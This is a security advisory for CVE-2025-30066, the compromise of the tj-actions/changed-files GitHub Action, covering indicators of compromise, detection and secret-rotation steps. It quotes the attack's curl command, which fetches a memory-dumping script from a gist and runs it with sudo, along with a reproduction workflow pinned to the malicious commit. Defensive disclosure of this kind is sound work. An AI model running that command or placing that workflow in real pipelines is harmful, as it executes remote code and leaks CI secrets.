logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2025-30066 ā€“ tj-actions/changed-files

Package

Manager: github_actions
Name: tj-actions/changed-files
Vulnerable Version: >=0 <46.0.1

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

EPSS: 0.88385 pctl0.99469

Details

tj-actions changed-files through 45.0.7 allows remote attackers to discover secrets by reading actions logs. ### Summary A supply chain attack compromised the **tj-actions/changed-files** GitHub Action, impacting over 23,000 repositories. Attackers retroactively modified multiple version tags to reference a malicious commit, exposing CI/CD secrets in workflow logs. The vulnerability existed between **March 14 and March 15, 2025**, and has since been mitigated. This poses a significant risk of unauthorized access to sensitive information. This has been patched in [v46.0.1](https://github.com/tj-actions/changed-files/releases/tag/v46.0.1). ### Details The attack involved modifying the **tj-actions/changed-files** GitHub Action to execute a malicious Python script. This script extracted secrets from the Runner Worker process memory and printed them in GitHub Actions logs, making them publicly accessible in repositories with public workflow logs. #### Key Indicators of Compromise (IoC): - **Malicious commit**: [0e58ed8671d6b60d0890c21b07f8835ace038e67](https://github.com/tj-actions/changed-files/commit/0e58ed8671d6b60d0890c21b07f8835ace038e67) - **Retroactively updated tags pointing to the malicious commit**: - `v1.0.0`: 0e58ed8671d6b60d0890c21b07f8835ace038e67 - `v35.7.7-sec`: 0e58ed8671d6b60d0890c21b07f8835ace038e67 - `v44.5.1`: 0e58ed8671d6b60d0890c21b07f8835ace038e67 #### Malicious Code Execution: The malicious script downloaded and executed a Python script that scanned memory for secrets, base64-encoded them, and logged them in the build logs: ``` B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3` ``` This script targeted the **Runner Worker process**, extracting and exfiltrating its memory contents. ### Proof of Concept (PoC) #### Steps to Reproduce: 1. Create a GitHub Actions workflow using the **tj-actions/changed-files** action: ```yml name: "tj-action changed-files incident" on: pull_request: branches: - main jobs: changed_files: runs-on: ubuntu-latest steps: - name: Get changed files id: changed-files uses: tj-actions/changed-files@0e58ed8671d6b60d0890c21b07f8835ace038e67 ``` 2. Run the workflow and inspect the logs in the Actions tab. 3. Vulnerable workflows may display secrets in the logs. #### Detection: Analyze network traffic using [Harden-Runner](https://github.com/step-security/harden-runner), which detects unauthorized outbound requests to: - `gist.githubusercontent.com` Live reproduction logs: šŸ”— [Harden-Runner Insights](https://app.stepsecurity.io/github/step-security/github-actions-goat/actions/runs/13866127357) This attack was detected by **StepSecurity** when anomaly detection flagged an unauthorized outbound network call to `gist.githubusercontent.com`. ### Duration of Vulnerability The vulnerability was active between **March 14 and March 15, 2025**. ### Action Required 1. **Review your workflows executed between March 14 and March 15**: - Check the **changed-files** section for unexpected output. - Decode suspicious output using the following command: ``` echo 'xxx' | base64 -d | base64 -d ``` - If the output contains sensitive information (e.g., tokens or secrets), revoke and rotate those secrets immediately. 2. **Update workflows referencing the compromised commit**: - If your workflows reference the malicious commit directly by its SHA, update them immediately to avoid using the compromised version. 3. **Tagged versions**: - If you are using tagged versions (e.g., `v35`, `v44.5.1`), no action is required as these tags have been updated and are now safe to use. 4. **Rotate potentially exposed secrets**: - As a precaution, rotate any secrets that may have been exposed during this timeframe to ensure the continued security of your workflows. ### Impact - **Type of vulnerability**: Supply chain attack, Secrets exposure, Information leakage - **Who is impacted**: - Over 23,000 repositories using **tj-actions/changed-files**. - Organizations with public repositories are at the highest risk, as their logs may already be compromised. - **Potential consequences**: - Theft of CI/CD secrets (API keys, cloud credentials, SSH keys). - Unauthorized access to source code, infrastructure, and production environments. - Credential leaks in public repositories, enabling further supply chain attacks.

Metadata

Created: 2025-03-15T06:30:34Z
Modified: 2025-03-24T14:23:37Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-mrrh-fwg8-r2c3/GHSA-mrrh-fwg8-r2c3.json
CWE IDs: ["CWE-506"]
Alternative ID: GHSA-mrrh-fwg8-r2c3
Finding: F448
Auto approve: 1